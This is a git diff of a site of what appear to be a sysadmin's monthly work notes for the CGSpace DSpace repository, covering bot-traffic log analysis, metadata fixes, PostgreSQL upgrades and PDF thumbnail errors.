      • I wrote a small Python script add-dc-rights.py to add usage rights (dc.rights) to CGSpace items based on the CSV Hector gave me from MARLO:
      -
      $ ./add-dc-rights.py -i /tmp/marlo.csv -db dspace -u dspace -p 'fuuu'
      +
      $ ./add-dc-rights.py -i /tmp/marlo.csv -db dspace -u dspace -p 'fuuu'
       
      • The file marlo.csv was cleaned up and formatted in Open Refine
      • 165 of the items in their 2017 data are from CGSpace!
      • I will add the data to CGSpace this week (done!)
      • Jesus, is Facebook trying to be annoying? At least the Tomcat Crawler Session Manager Valve is working to force the bot to re-use its Tomcat sessions:
      -
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "05/Nov/2018" | grep -c "2a03:2880:11ff:"
      +
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "05/Nov/2018" | grep -c "2a03:2880:11ff:"
       29889
      -# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-05
      +# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-05
       29763
      -# grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-05 | sort | uniq | wc -l
      +# grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-05 | sort | uniq | wc -l
       1057
      -# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "05/Nov/2018" | grep "2a03:2880:11ff:" | grep -c -E "(handle|bitstream)"
      +# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "05/Nov/2018" | grep "2a03:2880:11ff:" | grep -c -E "(handle|bitstream)"
       29896
       
      • 29,000 requests from Facebook and none of the requests are to the dynamic pages I rate limited yesterday!
      • @@ -403,8 +403,8 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11
        • Testing corrections and deletions for AGROVOC (dc.subject) that Sisay and Peter were working on earlier this month:
        -
        $ ./fix-metadata-values.py -i 2018-11-19-correct-agrovoc.csv -f dc.subject -t correct -m 57 -db dspace -u dspace -p 'fuu' -d
        -$ ./delete-metadata-values.py -i 2018-11-19-delete-agrovoc.csv -f dc.subject -m 57 -db dspace -u dspace -p 'fuu' -d
        +
        $ ./fix-metadata-values.py -i 2018-11-19-correct-agrovoc.csv -f dc.subject -t correct -m 57 -db dspace -u dspace -p 'fuu' -d
        +$ ./delete-metadata-values.py -i 2018-11-19-delete-agrovoc.csv -f dc.subject -m 57 -db dspace -u dspace -p 'fuu' -d
         
        • Then I ran them on both CGSpace and DSpace Test, and started a full Discovery re-index on CGSpace:
        @@ -497,7 +497,7 @@ $ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery
      • Linode alerted me that the outbound traffic rate on CGSpace (linode19) was very high
      • The top users this morning are:
      -
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "27/Nov/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
      +
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "27/Nov/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
           229 46.101.86.248
           261 66.249.64.61
           447 66.249.64.59
      diff --git a/docs/2018-12/index.html b/docs/2018-12/index.html
      index 1b2970508..9ed7660e5 100644
      --- a/docs/2018-12/index.html
      +++ b/docs/2018-12/index.html
      @@ -36,7 +36,7 @@ Then I ran all system updates and restarted the server
       
       I noticed that there is another issue with PDF thumbnails on CGSpace, and I see there was another Ghostscript vulnerability last week
       "/>
      -
      +
       
       
           
      @@ -135,8 +135,8 @@ I noticed that there is another issue with PDF thumbnails on CGSpace, and I see
       
      • The error when I try to manually run the media filter for one item from the command line:
      -
      org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `"gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pngalpha" -dTextAlphaBits=4 -dGraphicsAlphaBits=4 "-r72x72" -dFirstPage=1 -dLastPage=1 "-sOutputFile=/tmp/magick-12989PcFN0DnJOej7%d" "-f/tmp/magick-129895Bmp44lvUfxo" "-f/tmp/magick-12989C0QFG51fktLF"' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
      -org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `"gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pngalpha" -dTextAlphaBits=4 -dGraphicsAlphaBits=4 "-r72x72" -dFirstPage=1 -dLastPage=1 "-sOutputFile=/tmp/magick-12989PcFN0DnJOej7%d" "-f/tmp/magick-129895Bmp44lvUfxo" "-f/tmp/magick-12989C0QFG51fktLF"' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
      +
      org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `"gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pngalpha" -dTextAlphaBits=4 -dGraphicsAlphaBits=4 "-r72x72" -dFirstPage=1 -dLastPage=1 "-sOutputFile=/tmp/magick-12989PcFN0DnJOej7%d" "-f/tmp/magick-129895Bmp44lvUfxo" "-f/tmp/magick-12989C0QFG51fktLF"' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
      +org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `"gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pngalpha" -dTextAlphaBits=4 -dGraphicsAlphaBits=4 "-r72x72" -dFirstPage=1 -dLastPage=1 "-sOutputFile=/tmp/magick-12989PcFN0DnJOej7%d" "-f/tmp/magick-129895Bmp44lvUfxo" "-f/tmp/magick-12989C0QFG51fktLF"' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
               at org.im4java.core.Info.getBaseInfo(Info.java:360)
               at org.im4java.core.Info.<init>(Info.java:151)
               at org.dspace.app.mediafilter.ImageMagickThumbnailFilter.getImageFile(ImageMagickThumbnailFilter.java:142)
      @@ -158,13 +158,13 @@ org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.c
       
    • For what it’s worth, I get the same error on my local Arch Linux environment with Ghostscript 9.26:
    $ gs -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 -sDEVICE=pngalpha -dTextAlphaBits=4 -dGraphicsAlphaBits=4 -r72x72 -dFirstPage=1 -dLastPage=1 -sOutputFile=/tmp/out%d -f/home/aorth/Desktop/Food\ safety\ Kenya\ fruits.pdf
    -DEBUG: FC_WEIGHT didn't match
    +DEBUG: FC_WEIGHT didn't match
     zsh: segmentation fault (core dumped)  gs -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
     
    • When I replace the pngalpha device with png16m as suggested in the StackOverflow comments it works:
    $ gs -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 -sDEVICE=png16m -dTextAlphaBits=4 -dGraphicsAlphaBits=4 -r72x72 -dFirstPage=1 -dLastPage=1 -sOutputFile=/tmp/out%d -f/home/aorth/Desktop/Food\ safety\ Kenya\ fruits.pdf
    -DEBUG: FC_WEIGHT didn't match
    +DEBUG: FC_WEIGHT didn't match
     
    • Start proofing the latest round of 226 IITA archive records that Bosede sent last week and Sisay uploaded to DSpace Test this weekend (IITA_Dec_1_1997 aka Daniel1807)
        @@ -203,7 +203,7 @@ DEBUG: FC_WEIGHT didn't match
      $ identify Info\ Note\ Mainstreaming\ gender\ and\ social\ differentiation\ into\ CCAFS\ research\ activities\ in\ West\ Africa-converted.pdf\[0\]
       Info Note Mainstreaming gender and social differentiation into CCAFS research activities in West Africa-converted.pdf[0]=>Info Note Mainstreaming gender and social differentiation into CCAFS research activities in West Africa-converted.pdf PDF 595x841 595x841+0+0 16-bit sRGB 107443B 0.000u 0:00.000
      -identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/1746.
      +identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/1746.
       
      • And wow, I can’t even run ImageMagick’s identify on the first page of the second item (10568/98930):
      @@ -213,7 +213,7 @@ zsh: abort (core dumped) identify Food\ safety\ Kenya\ fruits.pdf\[0\]
    • But with GraphicsMagick’s identify it works:
    $ gm identify Food\ safety\ Kenya\ fruits.pdf\[0\]
    -DEBUG: FC_WEIGHT didn't match
    +DEBUG: FC_WEIGHT didn't match
     Food safety Kenya fruits.pdf PDF 612x792+0+0 DirectClass 8-bit 1.4Mi 0.000u 0m:0.000002s
     
    • Interesting that ImageMagick’s identify does work if you do not specify a page, perhaps as alluded to in the recent Ghostscript bug report:
    • @@ -224,20 +224,20 @@ Food safety Kenya fruits.pdf[1] PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.010
     Food safety Kenya fruits.pdf[2] PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.010u 0:00.009
     Food safety Kenya fruits.pdf[3] PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.010u 0:00.009
     Food safety Kenya fruits.pdf[4] PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.010u 0:00.009
    -identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/1746.
    +identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/1746.
    • As I expected, ImageMagick cannot generate a thumbnail, but GraphicsMagick can (though it looks like crap):
    $ convert Food\ safety\ Kenya\ fruits.pdf\[0\] -thumbnail 600x600 -flatten Food\ safety\ Kenya\ fruits.pdf.jpg
     zsh: abort (core dumped)  convert Food\ safety\ Kenya\ fruits.pdf\[0\] -thumbnail 600x600 -flatten
     $ gm convert Food\ safety\ Kenya\ fruits.pdf\[0\] -thumbnail 600x600 -flatten Food\ safety\ Kenya\ fruits.pdf.jpg
    -DEBUG: FC_WEIGHT didn't match
    +DEBUG: FC_WEIGHT didn't match
     
    • I inspected the troublesome PDF using jhove and noticed that it is using ISO PDF/A-1, Level B and the other one doesn’t list a profile, though I don’t think this is relevant
    • I found another item that fails when generating a thumbnail (10568/98391); DSpace complains:
    -
    org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `"gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pngalpha" -dTextAlphaBits=4 -dGraphicsAlphaBits=4 "-r72x72" -dFirstPage=1 -dLastPage=1 "-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d" "-f/tmp/magick-14296Q0rJjfCeIj3w" "-f/tmp/magick-14296k_K6MWqwvpDm"' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
    -org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `"gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pngalpha" -dTextAlphaBits=4 -dGraphicsAlphaBits=4 "-r72x72" -dFirstPage=1 -dLastPage=1 "-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d" "-f/tmp/magick-14296Q0rJjfCeIj3w" "-f/tmp/magick-14296k_K6MWqwvpDm"' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
    +
    org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `"gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pngalpha" -dTextAlphaBits=4 -dGraphicsAlphaBits=4 "-r72x72" -dFirstPage=1 -dLastPage=1 "-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d" "-f/tmp/magick-14296Q0rJjfCeIj3w" "-f/tmp/magick-14296k_K6MWqwvpDm"' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
    +org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `"gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pngalpha" -dTextAlphaBits=4 -dGraphicsAlphaBits=4 "-r72x72" -dFirstPage=1 -dLastPage=1 "-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d" "-f/tmp/magick-14296Q0rJjfCeIj3w" "-f/tmp/magick-14296k_K6MWqwvpDm"' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
             at org.im4java.core.Info.getBaseInfo(Info.java:360)
             at org.im4java.core.Info.<init>(Info.java:151)
             at org.dspace.app.mediafilter.ImageMagickThumbnailFilter.getImageFile(ImageMagickThumbnailFilter.java:142)
    @@ -253,11 +253,11 @@ org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.c
             at java.lang.reflect.Method.invoke(Method.java:498)
             at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:226)
             at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:78)
    -Caused by: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `"gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pngalpha" -dTextAlphaBits=4 -dGraphicsAlphaBits=4 "-r72x72" -dFirstPage=1 -dLastPage=1 "-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d" "-f/tmp/magick-14296Q0rJjfCeIj3w" "-f/tmp/magick-14296k_K6MWqwvpDm"' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
    +Caused by: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `"gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pngalpha" -dTextAlphaBits=4 -dGraphicsAlphaBits=4 "-r72x72" -dFirstPage=1 -dLastPage=1 "-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d" "-f/tmp/magick-14296Q0rJjfCeIj3w" "-f/tmp/magick-14296k_K6MWqwvpDm"' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
             at org.im4java.core.ImageCommand.run(ImageCommand.java:219)
             at org.im4java.core.Info.getBaseInfo(Info.java:342)
             ... 14 more
    -Caused by: org.im4java.core.CommandException: identify: FailedToExecuteCommand `"gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pngalpha" -dTextAlphaBits=4 -dGraphicsAlphaBits=4 "-r72x72" -dFirstPage=1 -dLastPage=1 "-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d" "-f/tmp/magick-14296Q0rJjfCeIj3w" "-f/tmp/magick-14296k_K6MWqwvpDm"' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
    +Caused by: org.im4java.core.CommandException: identify: FailedToExecuteCommand `"gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pngalpha" -dTextAlphaBits=4 -dGraphicsAlphaBits=4 "-r72x72" -dFirstPage=1 -dLastPage=1 "-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d" "-f/tmp/magick-14296Q0rJjfCeIj3w" "-f/tmp/magick-14296k_K6MWqwvpDm"' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
             at org.im4java.core.ImageCommand.finished(ImageCommand.java:253)
             at org.im4java.process.ProcessStarter.run(ProcessStarter.java:314)
             at org.im4java.core.ImageCommand.run(ImageCommand.java:215)
    @@ -274,22 +274,22 @@ zsh: abort (core dumped)  convert bnfb_biofortification\ Module_Participants\ Gu
     
    • So far the only thing that stands out is that the two files that don’t work were created with Microsoft Office 2016:
    -
    $ pdfinfo bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf | grep -E '^(Creator|Producer)'
    +
    $ pdfinfo bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf | grep -E '^(Creator|Producer)'
     Creator:        Microsoft® Word 2016
     Producer:       Microsoft® Word 2016
    -$ pdfinfo Food\ safety\ Kenya\ fruits.pdf | grep -E '^(Creator|Producer)'
    +$ pdfinfo Food\ safety\ Kenya\ fruits.pdf | grep -E '^(Creator|Producer)'
     Creator:        Microsoft® Word 2016
     Producer:       Microsoft® Word 2016
     
    • And the one that works was created with Office 365:
    -
    $ pdfinfo Info\ Note\ Mainstreaming\ gender\ and\ social\ differentiation\ into\ CCAFS\ research\ activities\ in\ West\ Africa-converted.pdf | grep -E '^(Creator|Producer)'
    +
    $ pdfinfo Info\ Note\ Mainstreaming\ gender\ and\ social\ differentiation\ into\ CCAFS\ research\ activities\ in\ West\ Africa-converted.pdf | grep -E '^(Creator|Producer)'
     Creator:        Microsoft® Word for Office 365
     Producer:       Microsoft® Word for Office 365
     
    • I remembered an old technique I was using to generate thumbnails in 2015 using Inkscape followed by ImageMagick or GraphicsMagick:
    -
    $ inkscape Food\ safety\ Kenya\ fruits.pdf -z --export-dpi=72 --export-area-drawing --export-png='cover.png'
    +
    $ inkscape Food\ safety\ Kenya\ fruits.pdf -z --export-dpi=72 --export-area-drawing --export-png='cover.png'
     $ gm convert -resize x600 -flatten -quality 85 cover.png cover.jpg
     
    • I’ve tried a few times this week to register for the Ethiopian eVisa website, but it is never successful
    • @@ -320,7 +320,7 @@ $ gm convert -resize x600 -flatten -quality 85 cover.png cover.jpg
      • Last night Linode sent a message that the load on CGSpace (linode18) was too high. Here is a list of the top users at the time and throughout the day:
      -
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Dec/2018:1(5|6|7|8)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
      +
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Dec/2018:1(5|6|7|8)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
           225 40.77.167.142
           226 66.249.64.63
           232 46.101.86.248
      @@ -331,7 +331,7 @@ $ gm convert -resize x600 -flatten -quality 85 cover.png cover.jpg
           962 66.249.70.27
          1193 35.237.175.180
          1450 2a01:4f8:140:3192::2
      -# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Dec/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
      +# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Dec/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
          1141 207.46.13.57
          1299 197.210.168.174
          1341 54.70.40.11
      @@ -345,9 +345,9 @@ $ gm convert -resize x600 -flatten -quality 85 cover.png cover.jpg
       
      • 35.237.175.180 is known to us (CCAFS?), and I’ve already added it to the list of bot IPs in nginx, which appears to be working:
      -
      $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180' dspace.log.2018-12-03
      +
      $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180' dspace.log.2018-12-03
       4772
      -$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180' dspace.log.2018-12-03 | sort | uniq | wc -l
      +$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180' dspace.log.2018-12-03 | sort | uniq | wc -l
       630
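The two grep commands above compare total hits against distinct session IDs for one client. A rough Python sketch of the same comparison follows, assuming the log lines contain `session_id=<32 chars>:ip_addr=<address>` exactly as in the grep pattern. The function name `session_reuse` is made up for illustration, and the IP is matched literally here, whereas grep treats each `.` as a wildcard.

```python
import re


def session_reuse(lines, ip):
    """Return (total_hits, unique_sessions) for one client IP.

    Mirrors `grep -c` and `grep -o ... | sort | uniq | wc -l`, assuming at
    most one session_id/ip_addr pair per log line.
    """
    # Same pattern as the grep above, but with the IP escaped so that the
    # dots only match literal dots.
    pattern = re.compile(r"session_id=([A-Z0-9]{32}):ip_addr=" + re.escape(ip))
    sessions = [m.group(1) for line in lines for m in pattern.finditer(line)]
    return len(sessions), len(set(sessions))
```

Calling it with an open log file, for example `session_reuse(open("dspace.log.2018-12-03"), "35.237.175.180")`, should give the same pair of numbers as the greps. A low number of unique sessions relative to total hits suggests the client is re-using its Tomcat sessions.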
       
      • I haven’t seen 2a01:4f8:140:3192::2 before. Its user agent is some new bot:
      • @@ -356,9 +356,9 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180' dspace.log.2018-12
      • At least it seems the Tomcat Crawler Session Manager Valve is working to re-use the common bot XMLUI sessions:
      -
      $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=2a01:4f8:140:3192::2' dspace.log.2018-12-03
      +
      $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=2a01:4f8:140:3192::2' dspace.log.2018-12-03
       5111
      -$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a01:4f8:140:3192::2' dspace.log.2018-12-03 | sort | uniq | wc -l
      +$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a01:4f8:140:3192::2' dspace.log.2018-12-03 | sort | uniq | wc -l
       419
       
      • 78.46.79.71 is another host on Hetzner with the following user agent:
      • @@ -368,9 +368,9 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a01:4f8:140:3192::2' dspace.log.2
      • This is not the first time a host on Hetzner has used a “normal” user agent to make thousands of requests
      • At least it is re-using its Tomcat sessions somehow:
      -
      $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71' dspace.log.2018-12-03
      +
      $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71' dspace.log.2018-12-03
       2044
      -$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71' dspace.log.2018-12-03 | sort | uniq | wc -l
      +$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71' dspace.log.2018-12-03 | sort | uniq | wc -l
       1
       
      • In other news, it’s good to see my re-work of the database connectivity in the dspace-statistics-api actually caused a reduction of persistent database connections (from 1 to 0, but still!):
      • @@ -385,7 +385,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71' dspace.log.2018-12-03
      • Linode sent a message last night that the CPU usage of CGSpace (linode18) was too high
      • I looked in the logs and there’s nothing particular going on:
      -
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "05/Dec/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
      +
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "05/Dec/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
          1225 157.55.39.177
          1240 207.46.13.12
          1261 207.46.13.101
      @@ -403,9 +403,9 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71' dspace.log.2018-12-03
       
      • But Tomcat is forcing them to re-use their Tomcat sessions with the Crawler Session Manager valve:
      -
      $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11' dspace.log.2018-12-05
      +
      $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11' dspace.log.2018-12-05
       6980
      -$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11' dspace.log.2018-12-05 | sort | uniq | wc -l
      +$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11' dspace.log.2018-12-05 | sort | uniq | wc -l
       1156
       
      • 2a01:7e00::f03c:91ff:fe0a:d645 appears to be the CKM dev server where Danny is testing harvesting via Drupal
      • @@ -446,7 +446,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11' dspace.log.2018-12-05
      • Linode alerted me twice today that the load on CGSpace (linode18) was very high
      • Looking at the nginx logs I see a few new IPs in the top 10:
      -
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "17/Dec/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
      +
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "17/Dec/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
           927 157.55.39.81
           975 54.70.40.11
          2090 50.116.102.77
      @@ -505,7 +505,7 @@ $ ls -lh cgspace_2018-12-19.backup*
       
      • Update usage rights on CGSpace as we agreed with Maria Garruccio and Peter last month:
      -
      $ ./fix-metadata-values.py -i /tmp/2018-11-27-update-rights.csv -f dc.rights -t correct -m 53 -db dspace -u dspace -p 'fuu' -d
      +
      $ ./fix-metadata-values.py -i /tmp/2018-11-27-update-rights.csv -f dc.rights -t correct -m 53 -db dspace -u dspace -p 'fuu' -d
       Connected to database.
       Fixed 466 occurences of: Copyrighted; Any re-use allowed
       
        @@ -519,7 +519,7 @@ Fixed 466 occurences of: Copyrighted; Any re-use allowed
         # pg_dropcluster 9.6 main
         # pg_upgradecluster 9.5 main
         # pg_dropcluster 9.5 main
        -# dpkg -l | grep postgresql | grep 9.5 | awk '{print $2}' | xargs dpkg -r
        +# dpkg -l | grep postgresql | grep 9.5 | awk '{print $2}' | xargs dpkg -r
      • I’ve been running PostgreSQL 9.6 for months on my local development and public DSpace Test (linode19) environments
      • Run all system updates on CGSpace (linode18) and restart the server
      • @@ -528,13 +528,13 @@ Fixed 466 occurences of: Copyrighted; Any re-use allowed
        $ dspace cleanup -v
          - Deleting bitstream information (ID: 158227)
          - Deleting bitstream record from database (ID: 158227)
        -Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
        -  Detail: Key (bitstream_id)=(158227) is still referenced from table "bundle".
        +Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
        +  Detail: Key (bitstream_id)=(158227) is still referenced from table "bundle".
         ...
         
        • As always, the solution is to delete those IDs manually in PostgreSQL:
        -
        $ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (158227, 158251);'
        +
        $ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (158227, 158251);'
         UPDATE 1
         
        • After all that I started a full Discovery reindex to get the index name changes and rights updates
        • @@ -544,7 +544,7 @@ UPDATE 1
        • CGSpace went down today for a few minutes while I was at dinner and I quickly restarted Tomcat
        • The top IP addresses as of this evening are:
        -
        # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "29/Dec/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
        +
        # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "29/Dec/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
             963 40.77.167.152
             987 35.237.175.180
            1062 40.77.167.55
        @@ -558,7 +558,7 @@ UPDATE 1
         
        • And just around the time of the alert:
        -
        # zcat --force /var/log/nginx/*.log.1 /var/log/nginx/*.log.2.gz | grep -E "29/Dec/2018:1(6|7|8)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
        +
        # zcat --force /var/log/nginx/*.log.1 /var/log/nginx/*.log.2.gz | grep -E "29/Dec/2018:1(6|7|8)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
             115 66.249.66.223
             118 207.46.13.14
             123 34.218.226.147
        diff --git a/docs/2019-01/index.html b/docs/2019-01/index.html
        index 49ca0b03e..a7a9810d7 100644
        --- a/docs/2019-01/index.html
        +++ b/docs/2019-01/index.html
        @@ -12,7 +12,7 @@
         Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning
         I don’t see anything interesting in the web server logs around that time though:
         
        -# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
        +# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
              92 40.77.167.4
              99 210.7.29.100
             120 38.126.157.45
        @@ -38,7 +38,7 @@ I don’t see anything interesting in the web server logs around that time t
         Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning
         I don’t see anything interesting in the web server logs around that time though:
         
        -# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
        +# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
              92 40.77.167.4
              99 210.7.29.100
             120 38.126.157.45
